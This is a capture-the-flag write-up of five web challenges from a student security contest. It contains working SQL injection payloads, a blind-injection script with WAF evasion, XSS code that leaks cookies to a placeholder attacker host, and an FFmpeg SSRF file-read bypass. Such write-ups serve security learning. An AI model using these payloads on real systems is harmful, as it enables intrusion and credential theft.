10th National College Student Information Security Contest - web writeup


PHP execise

http://106.75.126.194:6789
backup: http://106.75.126.228:6789

The input point executes PHP code directly. A look at disable_functions:

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,fopen,file_get_contents,fread,file_get_contents,file,readfile,opendir,readdir,closedir,rewinddir

Many file and directory functions are disabled, but the list is of course not complete, so it is still possible to list directories and perform other operations on files.

Listing the directory (scandir() is not in the list, unlike opendir()/readdir()):

$dir="./";$file=scandir($dir);print_r($file);   // scandir() is not disabled

Copy the flag file to a .txt file (copy() is not disabled, and the .txt copy can then be fetched as plain text):

copy('flag_62cfc2dc115277d0c04ed0f74e48e3e9.php','lemon.txt');   // copy() is not disabled

The flag is flag{php_mail_ld_preload}; judging from its contents, this challenge was solved by a seriously unintended route.

Skimmed other people's writeups; there are many other solutions: glob to list the directory, include or show_source to read the file.

wanna to see your hat

http://106.75.106.203:1515
backup: http://61.174.9.233:1515

Black-box testing was baffling; a directory scan later turned up .svn

http://106.75.106.203:1515/.svn/

svn recovery tool: https://github.com/kost/dvcs-ripper

The main problem is this str_replace in the recovered source.

Because common.php applies addslashes to all of $_POST globally, stripping the quote to empty here leaves only the \ that addslashes put in front of it, which is exactly what escapes the single quote that closes the value.

http://61.174.9.233:1515/route.php?act=login
name=or/**/1=1%23'&submit=check
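How the addslashes-then-strip combination becomes an injection, as an added example that is not from the writeup or the challenge's source. The writeup does not reproduce route.php's query, so the two-field shape name='…' AND password='…', the password value and the table name are assumptions; the tokenizer follows MySQL's rules for single-quoted literals (backslash escape, doubled quote, # comment) to show which part of the final string is treated as SQL rather than data, and the parameterised variant shows the fix against a constructed SQLite row.

```python
import sqlite3


def php_addslashes(s):
    """PHP addslashes(): backslash-escape ', ", \\ and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def challenge_filter(s):
    """Model of the route.php str_replace: drops the quote but keeps the
    backslash that common.php's addslashes added in front of it."""
    return s.replace("'", "")


def build_login_query(name, password):
    """Assumed query shape (route.php is not shown in the writeup)."""
    return f"SELECT * FROM user WHERE name='{name}' AND password='{password}'"


def sql_code_part(query):
    """Return the text MySQL treats as SQL code: everything outside single-quoted
    literals, each literal replaced by ?. Honours backslash escapes and doubled
    quotes inside literals and stops at a # comment."""
    code, i, n = [], 0, len(query)
    while i < n:
        ch = query[i]
        if ch == "#":                      # comment: the rest is ignored
            break
        if ch != "'":
            code.append(ch)
            i += 1
            continue
        i += 1                             # entering a literal
        while True:
            if i >= n:
                raise ValueError("unterminated string literal")
            if query[i] == "\\":           # escaped character
                i += 2
            elif query[i] == "'" and i + 1 < n and query[i + 1] == "'":
                i += 2                     # doubled quote inside the literal
            elif query[i] == "'":
                i += 1                     # closing quote
                break
            else:
                i += 1
        code.append("?")
    return "".join(code)


def filtered_query(name, password):
    """What the server executes under the assumed shape: addslashes first,
    then the quote-stripping str_replace. The lone backslash escapes the
    closing quote, so the password field's text becomes SQL code."""
    return build_login_query(challenge_filter(php_addslashes(name)),
                             challenge_filter(php_addslashes(password)))


def escaped_query(name, password):
    """Same shape with addslashes alone: the quote stays inside the literal."""
    return build_login_query(php_addslashes(name), php_addslashes(password))


def demo_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('admin', 's3cret')")   # constructed row
    return db


def parameterised_login(db, name, password):
    """Hardened form: bound parameters, so backslash and quote are data only."""
    return db.execute("SELECT name FROM user WHERE name=? AND password=?",
                      (name, password)).fetchone()


if __name__ == "__main__":
    print(sql_code_part(filtered_query("x'", " or 1=1#")))
    print(sql_code_part(escaped_query("x'", " or 1=1#")))
    print(parameterised_login(demo_db(), "x'", " or 1=1#"))
```

The first print shows the filtered pipeline executing `... WHERE name=? or 1=1`: the whole `' AND password=` text has been swallowed into the name literal and the attacker's `or 1=1` is now code. With addslashes alone the same input yields `... name=? AND password=?`, and with bound parameters the lookup simply returns no row.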

flag{good_job_white_hat}

flag vending machine

http://202.5.20.48/

The logic is: register a user -> log in -> buy.
Registration has a WAF that strips certain strings to empty, for example onselect.
I didn't notice this at first, which caused odd problems when logging in.
When buying, my guess is that it first looks up the price by the product id, then takes the username out of the session and runs an UPDATE directly to deduct the money from the user's wallet; the value taken from the session is not filtered, even though everything before it was.

import requests

site = 'http://202.5.20.48/'
url = site + 'register.php'
url1 = site + 'login.php'
url2 = site + 'buy.php?id=1'

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
          "Content-Type": "application/x-www-form-urlencoded"}

s = requests.session()

def reg(username):
  # the payload lives in the username; the registration WAF strips e.g. 'on'
  data = {
    'user': username,
    'pass' : '123456'
  }
  r = s.post(url,data=data,headers=headers)
  return r.text

def login(username):
  # the stored name is whatever survived the WAF, so log in with 'on' removed
  user = username.replace('on','')
  data = {
    'user': user,
    'pass' : '123456'
  }
  r1 = s.post(url1,data=data,headers=headers)
  return r1.text

def get_sql():
  # buy.php puts the session username into an UPDATE unfiltered; the 1s
  # timeout turns the sleep() branch into a requests Timeout exception
  r = s.get(url2,timeout=1)

def bypasswaf(payload):
  # the WAF deletes 'on' (and 'ff'): first protect the real occurrences
  # ('on' -> 'oonn'), which collapse back to 'on' after one deletion
  k = ['on','ff']
  for i in k:
    payload = payload.replace(i,i[0]+'on'+i[1:])

  # then split each blocked keyword with an 'on': 'seonlect' -> 'select'
  l = ['select','union','where']
  for i in l:
    payload = payload.replace(i,i[:3]+'on'+i[3:])

  # l = ['limit']
  # for i in l:
  #   payload = payload.replace(i,i[:2]+'on'+i[2:])

  return payload

def exp(n):
  # recover the n-th character of the query result by trying every printable
  # ASCII value; a timeout on buy.php means the guess was right
  for i in range(33,127):
  #for i in range(97,123):
    # n = 25
    # stage 1: table name, stage 2: column name, stage 3: the flag itself
    sql = "select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1"
    sql = "select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() limit 0,1"
    sql = "select thisi5f14g from fff1ag"
    #sql = "select 3456"
    sql = bypasswaf(sql)
    #user = "lemonkka'-(if(ord(mid((%s),%d,1))=%d,sleep(2),1))-0#" % (sql,n,i)
    user = "zzzkacaa'-(if(ord(mid((%s),%d,1))=%d,sleep(0.0001),1))-1#" % (sql,n,i)

    if 'exited' in reg(user):
      print('exited!!!!!!!!!!!')
    login(user)
    try:
      get_sql()
    except requests.exceptions.Timeout:
      return chr(i)
  return None

for i in range(1,30):
  print(i,'th: data')
  print(exp(i))

This gives the flag: flag{bbb6b6ui1d_5q1_iz_3z}

The pitfall was the #: I shouldn't have started by testing with %23, which is why nothing worked for ages.

Guestbook

http://106.75.119.64:8888/

Pretty much despair. There are two XSS points in total: rename.php and a text submission.

Directory structure:

It starts with a familiar routine: the text submission uses the XSS sandbox from 0ctf.

Creating a new iframe bypasses it: the sandbox hooks the top window's XMLHttpRequest, but a fresh about:blank frame has an untouched copy that can be swapped back in.

// the sandbox replaces window.XMLHttpRequest; take a clean one from a new frame
var iframe = document.createElement('iframe');
iframe.src = 'about:blank';
document.body.appendChild(iframe);
window.XMLHttpRequest = iframe.contentWindow.XMLHttpRequest;

Found that there is no cookie under /upload/.
Then read these lines on the homepage carefully:

hello guest,if you want, you can rname.

You can also send message to the administrator, the administrator will review your.

Guessed that the administrator is a bot that runs the XSS payload entered in the text box. /admin/review.php says "mb, you are not admin!!!", so I thought renaming myself to admin would be enough.

// minimal XHR helper (the ActiveXObject branches are legacy IE fallbacks)
var pkav = {
  ajax: function () {
    var xmlHttp;
    try {
      xmlHttp = new XMLHttpRequest();
    } catch (e) {
      try {
        xmlHttp = new ActiveXObject('Msxml2.XMLHTTP');
      } catch (e) {
        try {
          xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
        } catch (e) {
          return false;
        }
      }
    }
    return xmlHttp;
  },
  req: function (url, data, method, callback) {
    method = (method || '').toUpperCase();
    method = method || 'GET';
    data = data || '';
    if (url) {
      var a = this.ajax();
      a.open(method, url, true);
      if (method == 'POST') {
        a.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
      }
      a.onreadystatechange = function () {
        if (a.readyState == 4 && a.status == 200) {
          if (callback) {
            callback(a.responseText);
          }
        }
      };
      if ((typeof data) == 'object') {
        var arr = [];
        for (var i in data) {
          arr.push(i + '=' + encodeURIComponent(data[i]));
        }
        a.send(arr.join('&'));
      } else {
        a.send(data || null);
      }
    }
  },
  get: function (url, callback) {
    this.req(url, '', 'GET', callback);
  },
  post: function (url, data, callback) {
    this.req(url, data, 'POST', callback);
  }
};
// rename this user to admin, reload the index so the session reflects it,
// then fetch /admin/review.php and leak cookie + page body through a
// <link rel=prefetch> to the attacker host (placeholder //ipipip/)
pkav.post('http://106.75.119.64:8888/rename.php','nname=admin',function(data){
  pkav.get('http://106.75.119.64:8888/',function(data){
    pkav.get('http://106.75.119.64:8888/admin/review.php',function(data){
      var content = window.btoa(document.cookie).concat(window.btoa(data));
      var n0t = document.createElement("link");
      n0t.setAttribute("rel", "prefetch");
      n0t.setAttribute("href", "//ipipip/".concat(content));
      document.head.appendChild(n0t);
    });
  });
});

After a round of requests, the flag was in neither the source nor the cookies. Finally, an ajax request to /admin/ returned a 403 with no body, so I thought the flag might be hidden on that page; pulling the page and its cookies through an iframe showed the flag in there, and only then did I realise it was a cookie path issue.

<script>
// load /admin/ in a same-origin iframe: its document.cookie includes the
// cookie scoped to path /admin, which the top-level page never sees
var iframe = document.createElement("iframe");
iframe.setAttribute("src", "/admin/");
document.body.appendChild(iframe);
iframe.addEventListener( "load", function(){
  var content = iframe.contentWindow.document.cookie;
  // leak it through a prefetch link to the attacker host (placeholder //ipipip:8080/)
  var n0t = document.createElement("link");
  n0t.setAttribute("rel", "prefetch");
  n0t.setAttribute("href", "//ipipip:8080/".concat(window.btoa(content)));
  document.head.appendChild(n0t);
}, false);
</script>

flag:flag{cr4ck_c5p_m4ybe_3z}

方舟計划 (Ark Plan)

http://123.59.71.217

At registration the phone field is injectable, but testing showed some keywords are blocked outright: select from is intercepted, while select /*!50000from*/ gets past it.

username=xxee1&phone=-12' and extractvalue(0x2a,concat(0x2a,(select table_name /*!50000from*/ information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1))) and '1'='1&password=1234&repassword=1234

Querying the current user table needs one more nested select, which yields the username and password:
username=xxee1&phone=-12' and updatexml(1,concat(0x7e,(select a.name /*!50000from*/ (select password as name /*!50000from*/ user where id=1 limit 0,1)a)),0) and '1&password=1234&repassword=1234
fangzh0u
mIiD2wpTUTnWDzJO6d329w==

The secrectkey column of the config table gives a key.

AES decryption gives the password tencent123.

After that it is the FFmpeg SSRF vulnerability published a while ago, which can read local file contents.
Tool: https://github.com/neex/ffmpeg-avi-m3u-xbin

/proc/self/cmdline gives the site's path.

But reading the web directory's source turned up no flag, and uploading a file that reads /etc/passwd was blocked. The block matches specific keywords, so file:///etc//passwd gets past it; found

Finally reading /home/s0m3b0dy/flag gives the flag.

Learned a new trick while solving this:

When inserting a record, sometimes you want to update the row if one matching a condition already exists and insert otherwise, i.e. an insertOrUpdate; MySQL has the INSERT ... ON DUPLICATE KEY UPDATE syntax for this.
http://blog.csdn.net/ghsau/article/details/23557915

